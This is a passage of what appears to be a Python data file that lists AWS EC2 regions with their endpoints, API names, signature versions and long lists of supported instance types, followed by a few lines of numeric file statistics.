"r6g.16xlarge",
"r6g.2xlarge",
"r6g.4xlarge",
"r6g.8xlarge",
"r6g.large",
"r6g.medium",
"r6g.xlarge",
"r6gd.12xlarge",
"r6gd.16xlarge",
"r6gd.2xlarge",
"r6gd.4xlarge",
"r6gd.8xlarge",
"r6gd.large",
"r6gd.medium",
"r6gd.xlarge",
"r6i.12xlarge",
"r6i.16xlarge",
"r6i.24xlarge",
"r6i.2xlarge",
"r6i.32xlarge",
"r6i.4xlarge",
"r6i.8xlarge",
"r6i.large",
"r6i.xlarge",
"t1.micro",
"t2.2xlarge",
"t2.large",
"t2.medium",
"t2.micro",
"t2.nano",
"t2.small",
"t2.xlarge",
"t3.2xlarge",
"t3.large",
"t3.medium",
"t3.micro",
"t3.nano",
"t3.small",
"t3.xlarge",
"t3a.2xlarge",
"t3a.large",
"t3a.medium",
"t3a.micro",
"t3a.nano",
"t3a.small",
"t3a.xlarge",
"t4g.2xlarge",
"t4g.large",
"t4g.medium",
"t4g.micro",
"t4g.nano",
"t4g.small",
"t4g.xlarge",
"u-12tb1.112xlarge",
"u-3tb1.56xlarge",
"u-6tb1.112xlarge",
"u-6tb1.56xlarge",
"u-9tb1.112xlarge",
"vt1.24xlarge",
"vt1.3xlarge",
"vt1.6xlarge",
"x1.16xlarge",
"x1.32xlarge",
"x1e.16xlarge",
"x1e.2xlarge",
"x1e.32xlarge",
"x1e.4xlarge",
"x1e.8xlarge",
"x1e.xlarge",
"x2gd.12xlarge",
"x2gd.16xlarge",
"x2gd.2xlarge",
"x2gd.4xlarge",
"x2gd.8xlarge",
"x2gd.large",
"x2gd.medium",
"x2gd.xlarge",
"x2idn.16xlarge",
"x2idn.24xlarge",
"x2idn.32xlarge",
"x2iedn.16xlarge",
"x2iedn.24xlarge",
"x2iedn.2xlarge",
"x2iedn.32xlarge",
"x2iedn.4xlarge",
"x2iedn.8xlarge",
"x2iedn.xlarge",
"x2iezn.12xlarge",
"x2iezn.2xlarge",
"x2iezn.4xlarge",
"x2iezn.6xlarge",
"x2iezn.8xlarge",
"z1d.12xlarge",
"z1d.2xlarge",
"z1d.3xlarge",
"z1d.6xlarge",
"z1d.large",
"z1d.xlarge",
],
"signature_version": "2",
},
"us-east-2": {
"api_name": "ec2_us_east_ohio",
"country": "USA",
"endpoint": "ec2.us-east-2.amazonaws.com",
"id": "us-east-2",
"instance_types": [
"a1.2xlarge",
"a1.4xlarge",
"a1.large",
"a1.medium",
"a1.xlarge",
"c4.2xlarge",
"c4.4xlarge",
"c4.8xlarge",
"c4.large",
"c4.xlarge",
"c5.12xlarge",
"c5.18xlarge",
"c5.24xlarge",
"c5.2xlarge",
"c5.4xlarge",
"c5.9xlarge",
"c5.large",
"c5.xlarge",
"c5a.12xlarge",
"c5a.16xlarge",
"c5a.24xlarge",
"c5a.2xlarge",
"c5a.4xlarge",
"c5a.8xlarge",
"c5a.large",
"c5a.xlarge",
"c5ad.12xlarge",
"c5ad.16xlarge",
"c5ad.24xlarge",
"c5ad.2xlarge",
"c5ad.4xlarge",
"c5ad.8xlarge",
"c5ad.large",
"c5ad.xlarge",
"c5d.12xlarge",
"c5d.18xlarge",
"c5d.24xlarge",
"c5d.2xlarge",
"c5d.4xlarge",
"c5d.9xlarge",
"c5d.large",
"c5d.xlarge",
"c5n.18xlarge",
"c5n.2xlarge",
"c5n.4xlarge",
"c5n.9xlarge",
"c5n.large",
"c5n.xlarge",
"c6a.12xlarge",
"c6a.16xlarge",
"c6a.24xlarge",
"c6a.2xlarge",
"c6a.32xlarge",
"c6a.48xlarge",
"c6a.4xlarge",
"c6a.8xlarge",
"c6a.large",
"c6a.xlarge",
"c6g.12xlarge",
"c6g.16xlarge",
"c6g.2xlarge",
"c6g.4xlarge",
"c6g.8xlarge",
"c6g.large",
"c6g.medium",
"c6g.xlarge",
"c6gd.12xlarge",
"c6gd.16xlarge",
"c6gd.2xlarge",
"c6gd.4xlarge",
"c6gd.8xlarge",
"c6gd.large",
"c6gd.medium",
"c6gd.xlarge",
"c6gn.12xlarge",
"c6gn.16xlarge",
"c6gn.2xlarge",
"c6gn.4xlarge",
"c6gn.8xlarge",
"c6gn.large",
"c6gn.medium",
"c6gn.xlarge",
"c6i.12xlarge",
"c6i.16xlarge",
"c6i.24xlarge",
"c6i.2xlarge",
"c6i.32xlarge",
"c6i.4xlarge",
"c6i.8xlarge",
"c6i.large",
"c6i.xlarge",
"d2.2xlarge",
"d2.4xlarge",
"d2.8xlarge",
"d2.xlarge",
"d3.2xlarge",
"d3.4xlarge",
"d3.8xlarge",
"d3.xlarge",
"g3.16xlarge",
"g3.4xlarge",
"g3.8xlarge",
"g3s.xlarge",
"g4ad.16xlarge",
"g4ad.2xlarge",
"g4ad.4xlarge",
"g4ad.8xlarge",
"g4ad.xlarge",
"g4dn.12xlarge",
"g4dn.16xlarge",
"g4dn.2xlarge",
"g4dn.4xlarge",
"g4dn.8xlarge",
"g4dn.xlarge",
"h1.16xlarge",
"h1.2xlarge",
"h1.4xlarge",
"h1.8xlarge",
"hpc6a.48xlarge",
"i2.2xlarge",
"i2.4xlarge",
"i2.8xlarge",
"i2.large",
"i2.xlarge",
"i3.16xlarge",
"i3.2xlarge",
"i3.4xlarge",
"i3.8xlarge",
"i3.large",
"i3.xlarge",
"i3en.12xlarge",
"i3en.24xlarge",
"i3en.2xlarge",
"i3en.3xlarge",
"i3en.6xlarge",
"i3en.large",
"i3en.xlarge",
"i4i.16xlarge",
"i4i.2xlarge",
"i4i.32xlarge",
"i4i.4xlarge",
"i4i.8xlarge",
"i4i.large",
"i4i.xlarge",
"im4gn.16xlarge",
"im4gn.2xlarge",
"im4gn.4xlarge",
"im4gn.8xlarge",
"im4gn.large",
"im4gn.xlarge",
"inf1.24xlarge",
"inf1.2xlarge",
"inf1.6xlarge",
"inf1.xlarge",
"is4gen.2xlarge",
"is4gen.4xlarge",
"is4gen.8xlarge",
"is4gen.large",
"is4gen.medium",
"is4gen.xlarge",
"m4.10xlarge",
"m4.16xlarge",
"m4.2xlarge",
"m4.4xlarge",
"m4.large",
"m4.xlarge",
"m5.12xlarge",
"m5.16xlarge",
"m5.24xlarge",
"m5.2xlarge",
"m5.4xlarge",
"m5.8xlarge",
"m5.large",
"m5.xlarge",
"m5a.12xlarge",
"m5a.16xlarge",
"m5a.24xlarge",
"m5a.2xlarge",
"m5a.4xlarge",
"m5a.8xlarge",
"m5a.large",
"m5a.xlarge",
"m5ad.12xlarge",
"m5ad.16xlarge",
"m5ad.24xlarge",
"m5ad.2xlarge",
"m5ad.4xlarge",
"m5ad.8xlarge",
"m5ad.large",
"m5ad.xlarge",
"m5d.12xlarge",
"m5d.16xlarge",
"m5d.24xlarge",
"m5d.2xlarge",
"m5d.4xlarge",
"m5d.8xlarge",
"m5d.large",
"m5d.xlarge",
"m5dn.12xlarge",
"m5dn.16xlarge",
"m5dn.24xlarge",
"m5dn.2xlarge",
"m5dn.4xlarge",
"m5dn.8xlarge",
"m5dn.large",
"m5dn.xlarge",
"m5n.12xlarge",
"m5n.16xlarge",
"m5n.24xlarge",
"m5n.2xlarge",
"m5n.4xlarge",
"m5n.8xlarge",
"m5n.large",
"m5n.xlarge",
"m5zn.12xlarge",
"m5zn.2xlarge",
"m5zn.3xlarge",
"m5zn.6xlarge",
"m5zn.large",
"m5zn.xlarge",
"m6a.12xlarge",
"m6a.16xlarge",
"m6a.24xlarge",
"m6a.2xlarge",
"m6a.32xlarge",
"m6a.48xlarge",
"m6a.4xlarge",
"m6a.8xlarge",
"m6a.large",
"m6a.xlarge",
"m6g.12xlarge",
"m6g.16xlarge",
"m6g.2xlarge",
"m6g.4xlarge",
"m6g.8xlarge",
"m6g.large",
"m6g.medium",
"m6g.xlarge",
"m6gd.12xlarge",
"m6gd.16xlarge",
"m6gd.2xlarge",
"m6gd.4xlarge",
"m6gd.8xlarge",
"m6gd.large",
"m6gd.medium",
"m6gd.xlarge",
"m6i.12xlarge",
"m6i.16xlarge",
"m6i.24xlarge",
"m6i.2xlarge",
"m6i.32xlarge",
"m6i.4xlarge",
"m6i.8xlarge",
"m6i.large",
"m6i.xlarge",
"p2.16xlarge",
"p2.8xlarge",
"p2.xlarge",
"p3.16xlarge",
"p3.2xlarge",
"p3.8xlarge",
"p4d.24xlarge",
"r3.2xlarge",
"r3.4xlarge",
"r3.8xlarge",
"r3.large",
"r3.xlarge",
"r4.16xlarge",
"r4.2xlarge",
"r4.4xlarge",
"r4.8xlarge",
"r4.large",
"r4.xlarge",
"r5.12xlarge",
"r5.16xlarge",
"r5.24xlarge",
"r5.2xlarge",
"r5.4xlarge",
"r5.8xlarge",
"r5.large",
"r5.xlarge",
"r5a.12xlarge",
"r5a.16xlarge",
"r5a.24xlarge",
"r5a.2xlarge",
"r5a.4xlarge",
"r5a.8xlarge",
"r5a.large",
"r5a.xlarge",
"r5ad.12xlarge",
"r5ad.16xlarge",
"r5ad.24xlarge",
"r5ad.2xlarge",
"r5ad.4xlarge",
"r5ad.8xlarge",
"r5ad.large",
"r5ad.xlarge",
"r5b.12xlarge",
"r5b.16xlarge",
"r5b.24xlarge",
"r5b.2xlarge",
"r5b.4xlarge",
"r5b.8xlarge",
"r5b.large",
"r5b.xlarge",
"r5d.12xlarge",
"r5d.16xlarge",
"r5d.24xlarge",
"r5d.2xlarge",
"r5d.4xlarge",
"r5d.8xlarge",
"r5d.large",
"r5d.xlarge",
"r5dn.12xlarge",
"r5dn.16xlarge",
"r5dn.24xlarge",
"r5dn.2xlarge",
"r5dn.4xlarge",
"r5dn.8xlarge",
"r5dn.large",
"r5dn.xlarge",
"r5n.12xlarge",
"r5n.16xlarge",
"r5n.24xlarge",
"r5n.2xlarge",
"r5n.4xlarge",
"r5n.8xlarge",
"r5n.large",
"r5n.xlarge",
"r6g.12xlarge",
"r6g.16xlarge",
"r6g.2xlarge",
"r6g.4xlarge",
"r6g.8xlarge",
"r6g.large",
"r6g.medium",
"r6g.xlarge",
"r6gd.12xlarge",
"r6gd.16xlarge",
"r6gd.2xlarge",
"r6gd.4xlarge",
"r6gd.8xlarge",
"r6gd.large",
"r6gd.medium",
"r6gd.xlarge",
"r6i.12xlarge",
"r6i.16xlarge",
"r6i.24xlarge",
"r6i.2xlarge",
"r6i.32xlarge",
"r6i.4xlarge",
"r6i.8xlarge",
"r6i.large",
"r6i.xlarge",
"t2.2xlarge",
"t2.large",
"t2.medium",
"t2.micro",
"t2.nano",
"t2.small",
"t2.xlarge",
"t3.2xlarge",
"t3.large",
"t3.medium",
"t3.micro",
"t3.nano",
"t3.small",
"t3.xlarge",
"t3a.2xlarge",
"t3a.large",
"t3a.medium",
"t3a.micro",
"t3a.nano",
"t3a.small",
"t3a.xlarge",
"t4g.2xlarge",
"t4g.large",
"t4g.medium",
"t4g.micro",
"t4g.nano",
"t4g.small",
"t4g.xlarge",
"u-6tb1.112xlarge",
"u-6tb1.56xlarge",
"x1.16xlarge",
"x1.32xlarge",
"x1e.16xlarge",
"x1e.2xlarge",
"x1e.32xlarge",
"x1e.4xlarge",
"x1e.8xlarge",
"x1e.xlarge",
"x2gd.12xlarge",
"x2gd.16xlarge",
"x2gd.2xlarge",
"x2gd.4xlarge",
"x2gd.8xlarge",
"x2gd.large",
"x2gd.medium",
"x2gd.xlarge",
"x2idn.16xlarge",
"x2idn.24xlarge",
"x2idn.32xlarge",
"x2iedn.16xlarge",
"x2iedn.24xlarge",
"x2iedn.2xlarge",
"x2iedn.32xlarge",
"x2iedn.4xlarge",
"x2iedn.8xlarge",
"x2iedn.xlarge",
"z1d.12xlarge",
"z1d.2xlarge",
"z1d.3xlarge",
"z1d.6xlarge",
"z1d.large",
"z1d.xlarge",
],
"signature_version": "4",
},
"us-gov-west-1": {
"api_name": "ec2_us_govwest",
"country": "US",
"endpoint": "ec2.us-gov-west-1.amazonaws.com",
"id": "us-gov-west-1",
"instance_types": [],
"signature_version": "2",
},
"us-west-1": {
"api_name": "ec2_us_west",
"country": "USA",
"endpoint": "ec2.us-west-1.amazonaws.com",
"id": "us-west-1",
"instance_types": [
"c1.medium",
"c1.xlarge",
"c3.2xlarge",
"c3.4xlarge",
"c3.8xlarge",
"c3.large",
"c3.xlarge",
"c4.2xlarge",
"c4.4xlarge",
"c4.8xlarge",
"c4.large",
"c4.xlarge",
"c5.12xlarge",
"c5.18xlarge",
"c5.24xlarge",
"c5.2xlarge",
"c5.4xlarge",
"c5.9xlarge",
"c5.large",
"c5.xlarge",
"c5a.12xlarge",
"c5a.16xlarge",
"c5a.24xlarge",
"c5a.2xlarge",
"c5a.4xlarge",
"c5a.8xlarge",
"c5a.large",
"c5a.xlarge",
"c5d.12xlarge",
"c5d.18xlarge",
"c5d.24xlarge",
"c5d.2xlarge",
"c5d.4xlarge",
"c5d.9xlarge",
"c5d.large",
"c5d.xlarge",
"c5n.18xlarge",
"c5n.2xlarge",
"c5n.4xlarge",
"c5n.9xlarge",
"c5n.large",
"c5n.xlarge",
"c6g.12xlarge",
"c6g.16xlarge",
"c6g.2xlarge",
"c6g.4xlarge",
"c6g.8xlarge",
"c6g.large",
"c6g.medium",
"c6g.xlarge",
"c6gd.12xlarge",
"c6gd.16xlarge",
"c6gd.2xlarge",
"c6gd.4xlarge",
"c6gd.8xlarge",
"c6gd.large",
"c6gd.medium",
"c6gd.xlarge",
"c6gn.12xlarge",
"c6gn.16xlarge",
"c6gn.2xlarge",
"c6gn.4xlarge",
"c6gn.8xlarge",
"c6gn.large",
"c6gn.medium",
"c6gn.xlarge",
"c6i.12xlarge",
"c6i.16xlarge",
"c6i.24xlarge",
"c6i.2xlarge",
"c6i.32xlarge",
"c6i.4xlarge",
"c6i.8xlarge",
"c6i.large",
"c6i.xlarge",
"d2.2xlarge",
"d2.4xlarge",
"d2.8xlarge",
"d2.xlarge",
"g2.2xlarge",
"g2.8xlarge",
"g3.16xlarge",
"g3.4xlarge",
"g3.8xlarge",
"g4dn.12xlarge",
"g4dn.16xlarge",
"g4dn.2xlarge",
"g4dn.4xlarge",
"g4dn.8xlarge",
"g4dn.xlarge",
"i2.2xlarge",
"i2.4xlarge",
"i2.8xlarge",
"i2.large",
"i2.xlarge",
"i3.16xlarge",
"i3.2xlarge",
"i3.4xlarge",
"i3.8xlarge",
"i3.large",
"i3.xlarge",
"i3en.12xlarge",
"i3en.24xlarge",
"i3en.2xlarge",
"i3en.3xlarge",
"i3en.6xlarge",
"i3en.large",
"i3en.xlarge",
"inf1.24xlarge",
"inf1.2xlarge",
"inf1.6xlarge",
"inf1.xlarge",
"m1.large",
"m1.medium",
"m1.small",
"m1.xlarge",
"m2.2xlarge",
"m2.4xlarge",
"m2.xlarge",
"m3.2xlarge",
"m3.large",
"m3.medium",
"m3.xlarge",
"m4.10xlarge",
"m4.16xlarge",
"m4.2xlarge",
"m4.4xlarge",
"m4.large",
"m4.xlarge",
"m5.12xlarge",
"m5.16xlarge",
"m5.24xlarge",
"m5.2xlarge",
"m5.4xlarge",
"m5.8xlarge",
"m5.large",
"m5.xlarge",
"m5a.12xlarge",
"m5a.16xlarge",
"m5a.24xlarge",
"m5a.2xlarge",
"m5a.4xlarge",
"m5a.8xlarge",
"m5a.large",
"m5a.xlarge",
"m5ad.12xlarge",
"m5ad.16xlarge",
"m5ad.24xlarge",
"m5ad.2xlarge",
"m5ad.4xlarge",
"m5ad.8xlarge",
"m5ad.large",
"m5ad.xlarge",
"m5d.12xlarge",
"m5d.16xlarge",
"m5d.24xlarge",
"m5d.2xlarge",
"m5d.4xlarge",
"m5d.8xlarge",
"m5d.large",
"m5d.xlarge",
"m5zn.12xlarge",
"m5zn.2xlarge",
"m5zn.3xlarge",
"m5zn.6xlarge",
"m5zn.large",
"m5zn.xlarge",
"m6g.12xlarge",
"m6g.16xlarge",
"m6g.2xlarge",
"m6g.4xlarge",
"m6g.8xlarge",
"m6g.large",
"m6g.medium",
"m6g.xlarge",
"m6gd.12xlarge",
"m6gd.16xlarge",
"m6gd.2xlarge",
"m6gd.4xlarge",
"m6gd.8xlarge",
"m6gd.large",
"m6gd.medium",
"m6gd.xlarge",
"m6i.12xlarge",
"m6i.16xlarge",
"m6i.24xlarge",
"m6i.2xlarge",
"m6i.32xlarge",
"m6i.4xlarge",
"m6i.8xlarge",
"m6i.large",
"m6i.xlarge",
"r3.2xlarge",
"r3.4xlarge",
"r3.8xlarge",
"r3.large",
"r3.xlarge",
"r4.16xlarge",
"r4.2xlarge",
"r4.4xlarge",
"r4.8xlarge",
"r4.large",
"r4.xlarge",
"r5.12xlarge",
"r5.16xlarge",
"r5.24xlarge",
"r5.2xlarge",
"r5.4xlarge",
"r5.8xlarge",
"r5.large",
"r5.xlarge",
"r5a.12xlarge",
"r5a.16xlarge",
"r5a.24xlarge",
"r5a.2xlarge",
"r5a.4xlarge",
"r5a.8xlarge",
"r5a.large",
"r5a.xlarge",
"r5ad.12xlarge",
"r5ad.16xlarge",
"r5ad.24xlarge",
"r5ad.2xlarge",
"r5ad.4xlarge",
"r5ad.8xlarge",
"r5ad.large",
"r5ad.xlarge",
"r5d.12xlarge",
"r5d.16xlarge",
"r5d.24xlarge",
"r5d.2xlarge",
"r5d.4xlarge",
"r5d.8xlarge",
"r5d.large",
"r5d.xlarge",
"r5n.12xlarge",
"r5n.16xlarge",
"r5n.24xlarge",
"r5n.2xlarge",
"r5n.4xlarge",
"r5n.8xlarge",
"r5n.large",
"r5n.xlarge",
"r6g.12xlarge",
"r6g.16xlarge",
"r6g.2xlarge",
"r6g.4xlarge",
"r6g.8xlarge",
"r6g.large",
"r6g.medium",
"r6g.xlarge",
"r6gd.12xlarge",
"r6gd.16xlarge",
"r6gd.2xlarge",
"r6gd.4xlarge",
"r6gd.8xlarge",
"r6gd.large",
"r6gd.medium",
"r6gd.xlarge",
"r6i.12xlarge",
"r6i.16xlarge",
"r6i.24xlarge",
"r6i.2xlarge",
"r6i.32xlarge",
"r6i.4xlarge",
"r6i.8xlarge",
"r6i.large",
"r6i.xlarge",
"t1.micro",
"t2.2xlarge",
"t2.large",
"t2.medium",
"t2.micro",
"t2.nano",
"t2.small",
"t2.xlarge",
"t3.2xlarge",
"t3.large",
"t3.medium",
"t3.micro",
"t3.nano",
"t3.small",
"t3.xlarge",
"t3a.2xlarge",
"t3a.large",
"t3a.medium",
"t3a.micro",
"t3a.nano",
"t3a.small",
"t3a.xlarge",
"t4g.2xlarge",
"t4g.large",
"t4g.medium",
"t4g.micro",
"t4g.nano",
"t4g.small",
"t4g.xlarge",
"z1d.12xlarge",
"z1d.2xlarge",
"z1d.3xlarge",
"z1d.6xlarge",
"z1d.large",
"z1d.xlarge",
],
"signature_version": "2",
},
"us-west-2": {
"api_name": "ec2_us_west_oregon",
"country": "US",
"endpoint": "ec2.us-west-2.amazonaws.com",
"id": "us-west-2",
"instance_types": [
"a1.2xlarge",
"a1.4xlarge",
"a1.large",
"a1.medium",
"a1.xlarge",
"c1.medium",
"c1.xlarge",
"c3.2xlarge",
"c3.4xlarge",
"c3.8xlarge",
"c3.large",
"c3.xlarge",
"c4.2xlarge",
"c4.4xlarge",
"c4.8xlarge",
"c4.large",
"c4.xlarge",
"c5.12xlarge",
"c5.18xlarge",
"c5.24xlarge",
"c5.2xlarge",
"c5.4xlarge",
"c5.9xlarge",
"c5.large",
"c5.xlarge",
"c5a.12xlarge",
"c5a.16xlarge",
"c5a.24xlarge",
"c5a.2xlarge",
"c5a.4xlarge",
"c5a.8xlarge",
"c5a.large",
"c5a.xlarge",
"c5ad.12xlarge",
"c5ad.16xlarge",
"c5ad.24xlarge",
"c5ad.2xlarge",
"c5ad.4xlarge",
"c5ad.8xlarge",
"c5ad.large",
"c5ad.xlarge",
"c5d.12xlarge",
"c5d.18xlarge",
"c5d.24xlarge",
"c5d.2xlarge",
"c5d.4xlarge",
"c5d.9xlarge",
"c5d.large",
"c5d.xlarge",
"c5n.18xlarge",
"c5n.2xlarge",
"c5n.4xlarge",
"c5n.9xlarge",
"c5n.large",
"c5n.xlarge",
"c6a.12xlarge",
"c6a.16xlarge",
"c6a.24xlarge",
"c6a.2xlarge",
"c6a.32xlarge",
"c6a.48xlarge",
"c6a.4xlarge",
"c6a.8xlarge",
"c6a.large",
"c6a.xlarge",
"c6g.12xlarge",
"c6g.16xlarge",
"c6g.2xlarge",
"c6g.4xlarge",
"c6g.8xlarge",
"c6g.large",
"c6g.medium",
"c6g.xlarge",
"c6gd.12xlarge",
"c6gd.16xlarge",
"c6gd.2xlarge",
"c6gd.4xlarge",
"c6gd.8xlarge",
"c6gd.large",
"c6gd.medium",
"c6gd.xlarge",
"c6gn.12xlarge",
"c6gn.16xlarge",
"c6gn.2xlarge",
"c6gn.4xlarge",
"c6gn.8xlarge",
"c6gn.large",
"c6gn.medium",
"c6gn.xlarge",
"c6i.12xlarge",
"c6i.16xlarge",
"c6i.24xlarge",
"c6i.2xlarge",
"c6i.32xlarge",
"c6i.4xlarge",
"c6i.8xlarge",
"c6i.large",
"c6i.xlarge",
"cc2.8xlarge",
"cr1.8xlarge",
"d2.2xlarge",
"d2.4xlarge",
"d2.8xlarge",
"d2.xlarge",
"d3.2xlarge",
"d3.4xlarge",
"d3.8xlarge",
"d3.xlarge",
"d3en.12xlarge",
"d3en.2xlarge",
"d3en.4xlarge",
"d3en.6xlarge",
"d3en.8xlarge",
"d3en.xlarge",
"dl1.24xlarge",
"f1.16xlarge",
"f1.2xlarge",
"f1.4xlarge",
"g2.2xlarge",
"g2.8xlarge",
"g3.16xlarge",
"g3.4xlarge",
"g3.8xlarge",
"g3s.xlarge",
"g4ad.16xlarge",
"g4ad.2xlarge",
"g4ad.4xlarge",
"g4ad.8xlarge",
"g4ad.xlarge",
"g4dn.12xlarge",
"g4dn.16xlarge",
"g4dn.2xlarge",
"g4dn.4xlarge",
"g4dn.8xlarge",
"g4dn.xlarge",
"g5.12xlarge",
"g5.16xlarge",
"g5.24xlarge",
"g5.2xlarge",
"g5.48xlarge",
"g5.4xlarge",
"g5.8xlarge",
"g5.xlarge",
"g5g.16xlarge",
"g5g.2xlarge",
"g5g.4xlarge",
"g5g.8xlarge",
"g5g.xlarge",
"h1.16xlarge",
"h1.2xlarge",
"h1.4xlarge",
"h1.8xlarge",
"hs1.8xlarge",
"i2.2xlarge",
"i2.4xlarge",
"i2.8xlarge",
"i2.large",
"i2.xlarge",
"i3.16xlarge",
"i3.2xlarge",
"i3.4xlarge",
"i3.8xlarge",
"i3.large",
"i3.xlarge",
"i3en.12xlarge",
"i3en.24xlarge",
"i3en.2xlarge",
"i3en.3xlarge",
"i3en.6xlarge",
"i3en.large",
"i3en.xlarge",
"i4i.16xlarge",
"i4i.2xlarge",
"i4i.32xlarge",
"i4i.4xlarge",
"i4i.8xlarge",
"i4i.large",
"i4i.xlarge",
"im4gn.16xlarge",
"im4gn.2xlarge",
"im4gn.4xlarge",
"im4gn.8xlarge",
"im4gn.large",
"im4gn.xlarge",
"inf1.24xlarge",
"inf1.2xlarge",
"inf1.6xlarge",
"inf1.xlarge",
"is4gen.2xlarge",
"is4gen.4xlarge",
"is4gen.8xlarge",
"is4gen.large",
"is4gen.medium",
"is4gen.xlarge",
"m1.large",
"m1.medium",
"m1.small",
"m1.xlarge",
"m2.2xlarge",
"m2.4xlarge",
"m2.xlarge",
"m3.2xlarge",
"m3.large",
"m3.medium",
"m3.xlarge",
"m4.10xlarge",
"m4.16xlarge",
"m4.2xlarge",
"m4.4xlarge",
"m4.large",
"m4.xlarge",
"m5.12xlarge",
"m5.16xlarge",
"m5.24xlarge",
"m5.2xlarge",
"m5.4xlarge",
"m5.8xlarge",
"m5.large",
"m5.xlarge",
"m5a.12xlarge",
"m5a.16xlarge",
"m5a.24xlarge",
"m5a.2xlarge",
"m5a.4xlarge",
"m5a.8xlarge",
"m5a.large",
"m5a.xlarge",
"m5ad.12xlarge",
"m5ad.16xlarge",
"m5ad.24xlarge",
"m5ad.2xlarge",
"m5ad.4xlarge",
"m5ad.8xlarge",
"m5ad.large",
"m5ad.xlarge",
"m5d.12xlarge",
"m5d.16xlarge",
"m5d.24xlarge",
"m5d.2xlarge",
"m5d.4xlarge",
"m5d.8xlarge",
"m5d.large",
"m5d.xlarge",
"m5dn.12xlarge",
"m5dn.16xlarge",
"m5dn.24xlarge",
"m5dn.2xlarge",
"m5dn.4xlarge",
"m5dn.8xlarge",
"m5dn.large",
"m5dn.xlarge",
"m5n.12xlarge",
"m5n.16xlarge",
"m5n.24xlarge",
"m5n.2xlarge",
"m5n.4xlarge",
"m5n.8xlarge",
"m5n.large",
"m5n.xlarge",
"m5zn.12xlarge",
"m5zn.2xlarge",
"m5zn.3xlarge",
"m5zn.6xlarge",
"m5zn.large",
"m5zn.xlarge",
"m6a.12xlarge",
"m6a.16xlarge",
"m6a.24xlarge",
"m6a.2xlarge",
"m6a.32xlarge",
"m6a.48xlarge",
"m6a.4xlarge",
"m6a.8xlarge",
"m6a.large",
"m6a.xlarge",
"m6g.12xlarge",
"m6g.16xlarge",
"m6g.2xlarge",
"m6g.4xlarge",
"m6g.8xlarge",
"m6g.large",
"m6g.medium",
"m6g.xlarge",
"m6gd.12xlarge",
"m6gd.16xlarge",
"m6gd.2xlarge",
"m6gd.4xlarge",
"m6gd.8xlarge",
"m6gd.large",
"m6gd.medium",
"m6gd.xlarge",
"m6i.12xlarge",
"m6i.16xlarge",
"m6i.24xlarge",
"m6i.2xlarge",
"m6i.32xlarge",
"m6i.4xlarge",
"m6i.8xlarge",
"m6i.large",
"m6i.xlarge",
"p2.16xlarge",
"p2.8xlarge",
"p2.xlarge",
"p3.16xlarge",
"p3.2xlarge",
"p3.8xlarge",
"p3dn.24xlarge",
"p4d.24xlarge",
"r3.2xlarge",
"r3.4xlarge",
"r3.8xlarge",
"r3.large",
"r3.xlarge",
"r4.16xlarge",
"r4.2xlarge",
"r4.4xlarge",
"r4.8xlarge",
"r4.large",
"r4.xlarge",
"r5.12xlarge",
"r5.16xlarge",
"r5.24xlarge",
"r5.2xlarge",
"r5.4xlarge",
"r5.8xlarge",
"r5.large",
"r5.xlarge",
"r5a.12xlarge",
"r5a.16xlarge",
"r5a.24xlarge",
"r5a.2xlarge",
"r5a.4xlarge",
"r5a.8xlarge",
"r5a.large",
"r5a.xlarge",
"r5ad.12xlarge",
"r5ad.16xlarge",
"r5ad.24xlarge",
"r5ad.2xlarge",
"r5ad.4xlarge",
"r5ad.8xlarge",
"r5ad.large",
"r5ad.xlarge",
"r5b.12xlarge",
"r5b.16xlarge",
"r5b.24xlarge",
"r5b.2xlarge",
"r5b.4xlarge",
"r5b.8xlarge",
"r5b.large",
"r5b.xlarge",
"r5d.12xlarge",
"r5d.16xlarge",
"r5d.24xlarge",
"r5d.2xlarge",
"r5d.4xlarge",
"r5d.8xlarge",
"r5d.large",
"r5d.xlarge",
"r5dn.12xlarge",
"r5dn.16xlarge",
"r5dn.24xlarge",
"r5dn.2xlarge",
"r5dn.4xlarge",
"r5dn.8xlarge",
"r5dn.large",
"r5dn.xlarge",
"r5n.12xlarge",
"r5n.16xlarge",
"r5n.24xlarge",
"r5n.2xlarge",
"r5n.4xlarge",
"r5n.8xlarge",
"r5n.large",
"r5n.xlarge",
"r6g.12xlarge",
"r6g.16xlarge",
"r6g.2xlarge",
"r6g.4xlarge",
"r6g.8xlarge",
"r6g.large",
"r6g.medium",
"r6g.xlarge",
"r6gd.12xlarge",
"r6gd.16xlarge",
"r6gd.2xlarge",
"r6gd.4xlarge",
"r6gd.8xlarge",
"r6gd.large",
"r6gd.medium",
"r6gd.xlarge",
"r6i.12xlarge",
"r6i.16xlarge",
"r6i.24xlarge",
"r6i.2xlarge",
"r6i.32xlarge",
"r6i.4xlarge",
"r6i.8xlarge",
"r6i.large",
"r6i.xlarge",
"t1.micro",
"t2.2xlarge",
"t2.large",
"t2.medium",
"t2.micro",
"t2.nano",
"t2.small",
"t2.xlarge",
"t3.2xlarge",
"t3.large",
"t3.medium",
"t3.micro",
"t3.nano",
"t3.small",
"t3.xlarge",
"t3a.2xlarge",
"t3a.large",
"t3a.medium",
"t3a.micro",
"t3a.nano",
"t3a.small",
"t3a.xlarge",
"t4g.2xlarge",
"t4g.large",
"t4g.medium",
"t4g.micro",
"t4g.nano",
"t4g.small",
"t4g.xlarge",
"u-12tb1.112xlarge",
"u-3tb1.56xlarge",
"u-6tb1.112xlarge",
"u-6tb1.56xlarge",
"u-9tb1.112xlarge",
"vt1.24xlarge",
"vt1.3xlarge",
"vt1.6xlarge",
"x1.16xlarge",
"x1.32xlarge",
"x1e.16xlarge",
"x1e.2xlarge",
"x1e.32xlarge",
"x1e.4xlarge",
"x1e.8xlarge",
"x1e.xlarge",
"x2gd.12xlarge",
"x2gd.16xlarge",
"x2gd.2xlarge",
"x2gd.4xlarge",
"x2gd.8xlarge",
"x2gd.large",
"x2gd.medium",
"x2gd.xlarge",
"x2idn.16xlarge",
"x2idn.24xlarge",
"x2idn.32xlarge",
"x2iedn.16xlarge",
"x2iedn.24xlarge",
"x2iedn.2xlarge",
"x2iedn.32xlarge",
"x2iedn.4xlarge",
"x2iedn.8xlarge",
"x2iedn.xlarge",
"x2iezn.12xlarge",
"x2iezn.2xlarge",
"x2iezn.4xlarge",
"x2iezn.6xlarge",
"x2iezn.8xlarge",
"z1d.12xlarge",
"z1d.2xlarge",
"z1d.3xlarge",
"z1d.6xlarge",
"z1d.large",
"z1d.xlarge",
],
"signature_version": "2",
},
}
| 26.934988
| 77
| 0.372179
| 12,437
| 162,822
| 4.862507
| 0.019699
| 0.004365
| 0.003803
| 0.005953
| 0.976569
| 0.960926
| 0.954874
| 0.954411
| 0.954411
| 0.953601
| 0
| 0.135892
| 0.476956
| 162,822
| 6,044
| 78
| 26.939444
